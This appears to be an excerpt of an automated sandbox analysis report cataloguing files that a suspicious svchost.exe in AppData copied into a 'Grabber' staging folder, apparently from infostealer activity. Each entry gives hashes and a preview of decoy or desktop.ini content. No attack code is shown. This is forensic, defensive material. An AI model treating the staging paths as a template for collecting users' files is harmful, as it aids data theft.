                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\GIGIYTFFYT.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\JDDHMPCDUJ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.5258560106596737
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
                                                  MD5:06E8F7E6DDD666DBD323F7D9210F91AE
                                                  SHA1:883AE527EE83ED9346CD82C33DFC0EB97298DC14
                                                  SHA-256:8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
                                                  SHA-512:F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Saved Pictures\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.514398793376306
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.5218877566914193
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
                                                  MD5:50A956778107A4272AAE83C86ECE77CB
                                                  SHA1:10BCE7EA45077C0BAAB055E0602EEF787DBA735E
                                                  SHA-256:B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
                                                  SHA-512:D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\EIVQSAOTAQ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
